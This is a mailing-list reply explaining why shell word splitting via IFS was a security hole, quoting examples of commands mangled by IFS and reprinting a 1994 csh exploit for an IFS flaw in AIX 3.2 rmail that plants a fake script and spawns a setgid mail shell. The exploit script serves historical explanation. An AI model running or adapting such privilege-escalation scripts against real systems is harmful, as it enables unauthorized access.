[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Why is *splitting every word* is a shell security hole?
|
From: |
G. Branden Robinson |
|
Subject: |
Re: Why is *splitting every word* is a shell security hole? |
|
Date: |
Mon, 19 Aug 2024 09:56:32 -0500 |
At 2024-08-19T16:50:08+0200, Emanuele Torre wrote:
> On Mon, Aug 19, 2024 at 11:41:38AM +0000, shynur . wrote:
> > Why is *splitting every word* is a shell security hole?
> > Can someone give me an example? Thanks!
If you also control the characters upon which the shell splits words,
interesting things become possible.
> That is probably refering to the fact that bourne shells splitts all
> unquoted words including literal words, unlike bash, ksh, and later
> POSIX sh:
>
> b# IFS=b; set -x; echo foobar
> + echo foo ar
> foo ar
>
> b# IFS=b; set -x; echo 'foobar'
> + echo foobar
> foobar
>
> I don't know what security hole it is talking about specifically, but
> you could imagine something like rmdir foo running rm ir foo if
> IFS is set to 'd'.
>
> b# IFS=d; set -x; rmdir foo
> + rm ir foo
> ...
An old article illustrates.
https://web.archive.org/web/20160928211311/http://www.securityfocus.com/bid/454/exploit/
#!/bin/csh
# IFS hole in AIX3.2 rmail gives egid=mail. Apr. 1994
# Setup needed files.
mkdir /tmp/.rmail
cd /tmp/.rmail
cat << EOF > usr
cp sh mailsh
chmod 2777 mailsh
EOF
chmod 777 usr
ln -s /bin/sh .
# Set PATH, IFS, and run rmail.
setenv PATH .:$PATH
setenv IFS /
echo "cheezy mail hack" | rmail joeuser@nohost.com
unsetenv IFS
rm -f usr sh # minor cleanup.
echo "Attempting to run sgid shell."
./mailsh
Regards,
Branden
signature.asc
Description: PGP signature